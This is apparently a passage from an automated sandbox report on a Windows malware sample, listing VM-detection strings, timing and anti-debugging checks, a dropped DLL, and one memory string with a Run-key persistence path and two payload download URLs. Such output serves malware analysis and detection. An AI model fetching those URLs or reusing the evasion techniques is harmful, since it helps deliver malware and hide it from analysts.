      Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000006C9B7E second address: 00000000006C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dllJump to dropped file
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA26DE6 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4089
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2858
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeAPI coverage: 5.6 %
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
      Source: powershell.exe, 0000000D.00000003.873648723.000000000547C000.00000004.00000001.sdmpBinary or memory string: Hyper-V
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: explorer.exe, 00000015.00000000.1043640137.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: ieinstal.exe, 00000013.00000003.996326865.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058515424.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061456480.0000000002D7C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000015.00000000.1021896089.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
      Source: explorer.exe, 00000015.00000000.1006326818.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
      Source: powershell.exe, 0000000D.00000002.1026909764.0000000007B1D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947961634.0000000007B16000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947999087.0000000007B1C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: powershell.exe, 0000000D.00000003.948189598.0000000007A86000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1026417858.0000000007A80000.00000004.00000001.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe~
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: explorer.exe, 00000015.00000000.1043887336.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: explorer.exe, 00000015.00000000.1043640137.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: powershell.exe, 0000000D.00000003.873648723.000000000547C000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpBinary or memory string: }l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: explorer.exe, 00000015.00000000.1040207828.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: explorer.exe, 00000015.00000000.1031820624.000000000FCB2000.00000004.00000001.sdmpBinary or memory string: 6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAd
      Source: explorer.exe, 00000015.00000000.1046821539.000000000FCF2000.00000004.00000001.sdmpBinary or memory string: 6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAg
      Source: wscript.exe, 00000001.00000003.816908505.000001E57788D000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}&
      Source: ieinstal.exe, 00000013.00000003.996326865.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058515424.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061456480.0000000002D7C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWpFcy
      Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpBinary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.bin
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

      Anti Debugging

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA26DE6 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA646A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA116E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA28EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA9FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA136CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA9FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA18E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA67794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA67794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA67794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA237F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA135A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA11DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA11DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA11DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA98DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA66DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA6A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA14D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA14D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA14D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA23D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA63540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA07D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EAA16 mov eax, dword ptr fs:[00000030h]
